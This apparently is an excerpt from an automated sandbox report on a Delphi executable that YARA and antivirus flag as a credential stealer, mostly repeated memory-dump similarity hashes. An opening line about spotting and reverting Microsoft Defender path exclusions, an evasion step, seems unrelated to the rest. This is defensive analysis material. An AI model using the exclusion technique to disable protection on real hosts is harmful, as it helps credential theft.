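Feed it the command-line field from Sysmon Event ID 1, Security 4688 (with command-line auditing enabled) or PowerShell 4104 script-block logs; on the suspect host, Get-MpPreference shows the ExclusionPath list that resulted, and Remove-MpPreference -ExclusionPath reverts it.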

                                                                                                        Target ID:7
                                                                                                        Start time:07:11:05
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\nhrhvnf\ghhqoznpon_638708802577261661.exe"
                                                                                                        Imagebase:0xea0000
                                                                                                        File size:1'282'560 bytes
                                                                                                        MD5 hash:2A64267B616C528EE9618165671CCA9A
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (aq$(aq
                                                                                                          • API String ID: 0-3916115647
                                                                                                          • Opcode ID: 9ea7a7e7b40e3a1b509ca94c6633e0fb2166bf539274d82052bfd64f17fdb1ce
                                                                                                          • Instruction ID: 888aa0e4802072e9152a05451969ef60946d316ec71899f29297b286177e8415
                                                                                                          • Opcode Fuzzy Hash: 9ea7a7e7b40e3a1b509ca94c6633e0fb2166bf539274d82052bfd64f17fdb1ce
                                                                                                          • Instruction Fuzzy Hash: 7BB18F78B012058FCB14EBACD49066EB7F6EFC8710B1485AAD886DB355DB74ED02CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: d
                                                                                                          • API String ID: 0-2564639436
                                                                                                          • Opcode ID: 6922ba2055a89e7fd0ddac3eecfbc262c5e796ffc55e1f15c096e53774682770
                                                                                                          • Instruction ID: 85f5f57ecfc7ede0bf67a111ac6cc9f5c5c99bcf0d3293cc62c2a0150604ccd0
                                                                                                          • Opcode Fuzzy Hash: 6922ba2055a89e7fd0ddac3eecfbc262c5e796ffc55e1f15c096e53774682770
                                                                                                          • Instruction Fuzzy Hash: D3D10231A016168FCB14EF59C48096AFBF5FF85320B19C6AAD8A9DB681D730FC51CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s
                                                                                                          • API String ID: 0-2660418068
                                                                                                          • Opcode ID: 3bdd7ed24879451a96835826b4572e4c2c48566d3c74d08e0cbb47777835facb
                                                                                                          • Instruction ID: 5938ddbb2d465f0e17d44a410bc7b9c3b6044a042cbd8ddce3744d3ae2fe5359
                                                                                                          • Opcode Fuzzy Hash: 3bdd7ed24879451a96835826b4572e4c2c48566d3c74d08e0cbb47777835facb
                                                                                                          • Instruction Fuzzy Hash: 1F419EB4E012199FCB44DFA9E984ADEBBF1FB89301F10856AE814A7350D7346E45CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s
                                                                                                          • API String ID: 0-2660418068
                                                                                                          • Opcode ID: 86ba59d48037b63fe11451bbe06257f55e9ffae6725792f2c49b36e818bc08b5
                                                                                                          • Instruction ID: 6bda189b8d20b72ba16c6c81bff3be3b6869154a33490784a11f5b13a17f443a
                                                                                                          • Opcode Fuzzy Hash: 86ba59d48037b63fe11451bbe06257f55e9ffae6725792f2c49b36e818bc08b5
                                                                                                          • Instruction Fuzzy Hash: 54417FB8E012199FCB44DFA9E984ADEBBF1FB89311F10852AE814A7340D7346E45CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d8982c1e42b0903d4783ac04059154bbdde055cc42af0ef6a1e834caeccbf21
                                                                                                          • Instruction ID: 2dc626c29c711731d1356b7c6f2a5d7f5b03a0a8075f804e0f017182944ce10c
                                                                                                          • Opcode Fuzzy Hash: 1d8982c1e42b0903d4783ac04059154bbdde055cc42af0ef6a1e834caeccbf21
                                                                                                          • Instruction Fuzzy Hash: 3BD1D074A022288FCB69EF29D998BDDB7F5BB89701F1080E9D809A3254DB305F81CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dcde9f070badeb5db2d0ed5a8569953a6d476a5f3a38b0290a862a4e116dd8ed
                                                                                                          • Instruction ID: cf83bc678b8cacb9191ac3b7a7c06bacaf55cd039a2ac91d93a6d947bd44c009
                                                                                                          • Opcode Fuzzy Hash: dcde9f070badeb5db2d0ed5a8569953a6d476a5f3a38b0290a862a4e116dd8ed
                                                                                                          • Instruction Fuzzy Hash: 25D18174A01229CFCB65EF28E9A8A9DB7B5FB89700F1081E9D90DA3354DB305E81CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd4166616da82eb57dda1c58245f52058ca69da73b3c7e9e4710a3644e22c4e7
                                                                                                          • Instruction ID: 0ac7ba70acdd62afd1dbeec62570f2ab4da6540a5961e8a76eccfcf14884fa39
                                                                                                          • Opcode Fuzzy Hash: bd4166616da82eb57dda1c58245f52058ca69da73b3c7e9e4710a3644e22c4e7
                                                                                                          • Instruction Fuzzy Hash: 2D819630A01206CFCF14DFA9D884AAEBBB2FF88310F148559E945AB355DB34E941CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 861c857e0e3c5d2dc1c25fcab0abd4fb01afd49c258d2fc335d463579ed69d81
                                                                                                          • Instruction ID: 227bdf768f125937371b986c7316680171a87e7111721e07b97add43909f0e1c
                                                                                                          • Opcode Fuzzy Hash: 861c857e0e3c5d2dc1c25fcab0abd4fb01afd49c258d2fc335d463579ed69d81
                                                                                                          • Instruction Fuzzy Hash: 47819B74A01229CFCBA5EF28D998B9DB7B5BB49701F1081E9E80DA7250DB306F85CF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 33f61f5b3364f1f4d8ff8227c4835c028c86c2748961fd0b3584cabff1c2dc46
                                                                                                          • Instruction ID: a7a6b5184aa495fdcfdeac424cd569a8949e707343045595f57a479b80e8a6b6
                                                                                                          • Opcode Fuzzy Hash: 33f61f5b3364f1f4d8ff8227c4835c028c86c2748961fd0b3584cabff1c2dc46
                                                                                                          • Instruction Fuzzy Hash: 9A712134A4122ACFCBA4EF28D994A9DB7B5BB88700F1040E9C84DA7254CB306F81CF41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dbf12a5a2eb8d31c453f170ab9147ee7b92f5421e71a2a8af5f5bf3a33e3940b
                                                                                                          • Instruction ID: 470ebc28ac10cc7dc3093281904c6b5d75cb0a825ba72af23f71fed8b41c77db
                                                                                                          • Opcode Fuzzy Hash: dbf12a5a2eb8d31c453f170ab9147ee7b92f5421e71a2a8af5f5bf3a33e3940b
                                                                                                          • Instruction Fuzzy Hash: 11514770D012498FCB05EFA8C5545EDFBB5FF8A300F248569D449BB254EB346A4ACB91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5b86a4e6f79bf544c96c2e783c59a5cf21d15f708f4e5d6a95d034db91584566
                                                                                                          • Instruction ID: 4606219a71fb6764a76a58ae91dbb8d902348f75b58fc90fbb6c300d9f237a62
                                                                                                          • Opcode Fuzzy Hash: 5b86a4e6f79bf544c96c2e783c59a5cf21d15f708f4e5d6a95d034db91584566
                                                                                                          • Instruction Fuzzy Hash: DC41D274E02208DBCB18DFA9E4909EEBBB2FF89311F109569E405B7354CB35A842CB65
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6b37d5877fc3f16e5c06280d4aa08c6687cbd40cf83edab6d6f7629e5e216330
                                                                                                          • Instruction ID: dae264532f2875e3f28151657e018dca5a1d222776a9b4cc4c3be03c9b38618e
                                                                                                          • Opcode Fuzzy Hash: 6b37d5877fc3f16e5c06280d4aa08c6687cbd40cf83edab6d6f7629e5e216330
                                                                                                          • Instruction Fuzzy Hash: A4418FB8E012199FCB44DFA8E994ADDBBF1FF89211F10856AE814A7350DB346E05CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98acac4916ce086a91763c46a2cd232155b30fce69c0c312d96050aae5c25825
                                                                                                          • Instruction ID: efc915c016ec5471d715574e75e2949396f0358ae89f6ab6f00653aae7fe98fa
                                                                                                          • Opcode Fuzzy Hash: 98acac4916ce086a91763c46a2cd232155b30fce69c0c312d96050aae5c25825
                                                                                                          • Instruction Fuzzy Hash: 8941E274E012599FCB04DFA9D880AEEBBF2FF89300B14816AE855E7351DB306905CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4b73bfacd7c9e4546ea408f030dd3d72b125764284932d50900f189270cd06f
                                                                                                          • Instruction ID: 9ecd72f2cd5ec2cc288aa8cf3a3f1f59ed599770495709e7dd6661f197b88cc5
                                                                                                          • Opcode Fuzzy Hash: b4b73bfacd7c9e4546ea408f030dd3d72b125764284932d50900f189270cd06f
                                                                                                          • Instruction Fuzzy Hash: 9A417278E012199FCB44DFA9E984ADDBBF1FB89211F10856AE814A7340DB346E05CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a29bc272df5f1478575b1c43d7245b176add87f7182775cfaaf67d0c8842463
• Instruction ID: 76e34a824b0a42665cdbe007e62c57114f8aad848ebae34b8af08dea34ecc70f
• Opcode Fuzzy Hash: 7a29bc272df5f1478575b1c43d7245b176add87f7182775cfaaf67d0c8842463
• Instruction Fuzzy Hash: 3F41D574E0120A9FCB41DFA8E988A9EBBF5FF49305F104569E804B7251D7346E44CF91
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 723a83b7f84b92ed1b6509eeac3d2167dd4dd5aefbd853c952d79d96dad443eb
• Instruction ID: 716bae7ed0824ca4e217a709ccc2917d01dd64e247761b45d5cafcafc2f6bf68
• Opcode Fuzzy Hash: 723a83b7f84b92ed1b6509eeac3d2167dd4dd5aefbd853c952d79d96dad443eb
• Instruction Fuzzy Hash: 3121C074E012099FCB44DFA9D484AEEBBF5FF89201F14856AD854BB340D7346A45CFA0
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ebe63ab5d7b54a215f6ea4ad4ad625fa0adbc3c7b17864209c28b99437477da
• Instruction ID: e9d57fdbe6a07c6027160ac35f758a96905a774f209d73ceaa0dee73718e885d
• Opcode Fuzzy Hash: 3ebe63ab5d7b54a215f6ea4ad4ad625fa0adbc3c7b17864209c28b99437477da
• Instruction Fuzzy Hash: 4F111C70902319DFCB18EFA9D894BEDBBB2BF8A310F149569D54177264CB315940CB68
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f0e1c326c923dd654f50bbc549da9d9afa85693baea3f5ce1be59fb083e0de77
• Instruction ID: 14056703f10bf6aea13247ff2260ae1bbf39ef401687980ef25d544b9710d96f
• Opcode Fuzzy Hash: f0e1c326c923dd654f50bbc549da9d9afa85693baea3f5ce1be59fb083e0de77
• Instruction Fuzzy Hash: BB119070C0A78E9ACB02EBB4E4143EDBFB4EF4A300F158495D4D0771A2DB351A19C755
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be676cc05c6209744d0024714a997d9d0b4eb8ec6cc8b96f8f179a762a9a04b4
• Instruction ID: a65a9285c3806269566bf1cf09dea86ab94802caa300c3e393df143c33351a37
• Opcode Fuzzy Hash: be676cc05c6209744d0024714a997d9d0b4eb8ec6cc8b96f8f179a762a9a04b4
• Instruction Fuzzy Hash: F0119171C06609DACB01BFA8E9483EDBFB4EF0A304F4154A5D4D072196DF355A29C759
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6a776a7fb04eec903f8ad1caf4d930fa5bd69ee5111366df402e19070465944
• Instruction ID: 65cb2748840886fe385f8238c9fb764a5c16b3c76356b7b19e637bfdf54f4a15
• Opcode Fuzzy Hash: c6a776a7fb04eec903f8ad1caf4d930fa5bd69ee5111366df402e19070465944
• Instruction Fuzzy Hash: F811FE75D116288BDB29DF2698043D9BAF6EFC9311F04C5FA9508A6255DB740B85CF40
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3447550ec9299c9a34eb12121824ec3bfd22654e5e5aba626dc3ae8d6a6f98f4
• Instruction ID: 8218d81c6538b49f3fa26c4791be0640a9f39e8baacb455911841f98a1b395bc
• Opcode Fuzzy Hash: 3447550ec9299c9a34eb12121824ec3bfd22654e5e5aba626dc3ae8d6a6f98f4
• Instruction Fuzzy Hash: 8C113970D02219CBCB18EFA9D854BEEFBB2BF8A310F14A029D541B7390CB315940CB69
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac7efbcd19ab6a7093a5362df93bbdc1b5e2d0ff15f9403e0d715b734fb9992b
• Instruction ID: 5bc5cf3e15d9df22961401b6645f3c348e1ae871816d29182814f2a4fb58fd2c
• Opcode Fuzzy Hash: ac7efbcd19ab6a7093a5362df93bbdc1b5e2d0ff15f9403e0d715b734fb9992b
• Instruction Fuzzy Hash: A3113A74E05258AFCB04DFA8E8919EDBBF5FF99300B50446AE545E7211DB346906CB50
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3c553b0b0ac74dc0930a5288151cdca1800728c55c5bf7c4c64b2b97951caad
• Instruction ID: db794d0e2111975654a357739469260926f1d83dc240f08e96f9c57c164b30cd
• Opcode Fuzzy Hash: e3c553b0b0ac74dc0930a5288151cdca1800728c55c5bf7c4c64b2b97951caad
• Instruction Fuzzy Hash: 53118E30C0A61ADFCF04EFA8E4542EDBBB1EF4A300F1184A9D094732A1DB351A69CB95
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89d43e535feab4e44c7db00805b8c09ca63e07b0441f437c96c4a78e08bd10e5
• Instruction ID: b4245d4d3f6f2c12caae2f898b96b72ae6d4e27a434f2d9dd62d04cc99dd5daf
• Opcode Fuzzy Hash: 89d43e535feab4e44c7db00805b8c09ca63e07b0441f437c96c4a78e08bd10e5
• Instruction Fuzzy Hash: F01133B0D0520A9FCB40EFA9D5846AEBFF1FF49300F2485AAC954E7351EB344A01CB91
Memory Dump Source
• Source File: 00000000.00000002.4460851134.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5cf57548179006be74b346c7e2cc4b4c89e0ef1c27eb5785822d08030b97a08
• Instruction ID: 3bcd53d41881a3c557083eadc48bdf242d0bb0c2ef96c240b3f6091c558a7421
• Opcode Fuzzy Hash: a5cf57548179006be74b346c7e2cc4b4c89e0ef1c27eb5785822d08030b97a08
• Instruction Fuzzy Hash: 8F012B710043449AE7208A69CDD4727FFA8DFC0BA4F5CC61AED098E287C3399945CAF1
Memory Dump Source
• Source File: 00000000.00000002.4460851134.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb4b5cffafe9c239ec3b512cb9ec1c4c9ea015598b83df3e2bebaa12a89d6628
• Instruction ID: 27f06a3185eddf648f277490b269c5405671d84342def99a676b4df7b73c42f3
• Opcode Fuzzy Hash: bb4b5cffafe9c239ec3b512cb9ec1c4c9ea015598b83df3e2bebaa12a89d6628
• Instruction Fuzzy Hash: 4AF0CD71404344AEE7208A1ACD84B66FFA8EB80B74F18C55AED084E297C3799845CAB1
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fce104b603c68e8ac59ade15f1b38807d98232e6968e0b9f0820d33b119841ed
• Instruction ID: df46d9e8bb1552ec349ea439e11069e74c6793820358cbd2a73e83e397a4c90a
• Opcode Fuzzy Hash: fce104b603c68e8ac59ade15f1b38807d98232e6968e0b9f0820d33b119841ed
• Instruction Fuzzy Hash: 99F08C709023489FCB12DF78A50469CBBB4EF46300B10469AD890DB262DA310F04DB41
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17fbdee76942c4c481c7a02fc565391652a676265cf3ac0a450c316338d3b6ea
• Instruction ID: f29ae4b0007316f715a554b89e3272c5e4bdd0427db12ac782426c8876c8656e
• Opcode Fuzzy Hash: 17fbdee76942c4c481c7a02fc565391652a676265cf3ac0a450c316338d3b6ea
• Instruction Fuzzy Hash: C6E0C2708063849FC712DBA8D844B617FF8DF47204F0801C5DC8487121DB72A521EBA1
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 343669b039a15f4b77d66ea8407e23d7bb6e329bd9f7267f95418356d5692334
• Instruction ID: b8c5a1d29355fc5878082e898412327bfa5992291c4479c3f8ef64a87bafb300
• Opcode Fuzzy Hash: 343669b039a15f4b77d66ea8407e23d7bb6e329bd9f7267f95418356d5692334
• Instruction Fuzzy Hash: BCD0A53D14A354178276539D78455D77FDCC5C7D2471C08F7D585C5911E141D444C191
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2f32ea9a5ec6ca84ee53a1f32628c6279b9c8bb962c38cc35cefe781019d2d4
• Instruction ID: 1fe77c1b26c17c3eff8c160ee904cfe9bdc2b61545144c4e57972f10a7d21246
• Opcode Fuzzy Hash: c2f32ea9a5ec6ca84ee53a1f32628c6279b9c8bb962c38cc35cefe781019d2d4
• Instruction Fuzzy Hash: 6DE08670901109EFCB10EFB8E50465DB7B9EB44301F104A999904D7200DF701F04DB81
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b7eda473c84329f866691f0a3b1a89020832f518201d5c8fa4dd07cab47cbe70
• Instruction ID: 6ea88254f665bf4f74b3acdac7d34f0e49363096513f8e6b3924b04a506fc290
• Opcode Fuzzy Hash: b7eda473c84329f866691f0a3b1a89020832f518201d5c8fa4dd07cab47cbe70
• Instruction Fuzzy Hash: E2E0C23040B3844FC312DBB4A905B507FB8DF03209F0842DAD88487157D6215104D762
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82cdeebda9d41de0accb13a7048cd9f9944dfc4e5962136697ba5fcd43e00492
• Instruction ID: fd8ddd438af60d956332229d676def94befe74a2d3fcaf444b11e8514180e5ef
• Opcode Fuzzy Hash: 82cdeebda9d41de0accb13a7048cd9f9944dfc4e5962136697ba5fcd43e00492
• Instruction Fuzzy Hash: B1E08C7080A3988FC7239BB8A4097A8BFB4AF1B304F0881CBC484A705BDB300588DB56
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2efdb7af336ec7556b9876ee5e06d9a0ae95113856b3c02d0ac1d25ea4239b47
• Instruction ID: 27e4d71f0bc6026bafec7121ad3a20c08b880c9ca113e96de71f6ee48a9620c3
• Opcode Fuzzy Hash: 2efdb7af336ec7556b9876ee5e06d9a0ae95113856b3c02d0ac1d25ea4239b47
• Instruction Fuzzy Hash: C1D01272D44182CBF7205B70C0187B8237ACB62301F056574404E631D2CD3955424A59
Memory Dump Source
• Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0754642e37a7f9e16ec2a1a2b5e2fe4138dab02cace2862ce95ef3ec202e4f75
                                                                                                          • Instruction ID: 57da8010b10cf569f63e6df71832020976de022d6f071806586dac7991e0d53d
                                                                                                          • Opcode Fuzzy Hash: 0754642e37a7f9e16ec2a1a2b5e2fe4138dab02cace2862ce95ef3ec202e4f75
                                                                                                          • Instruction Fuzzy Hash: 98C080748012189BC710EF98E509755F77CD702711F000199D54853104DF714510DBA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e4f9d516e7f211f2502750064b2de63b6032ae14dcb4d4dee7b1e3c2fd671a80
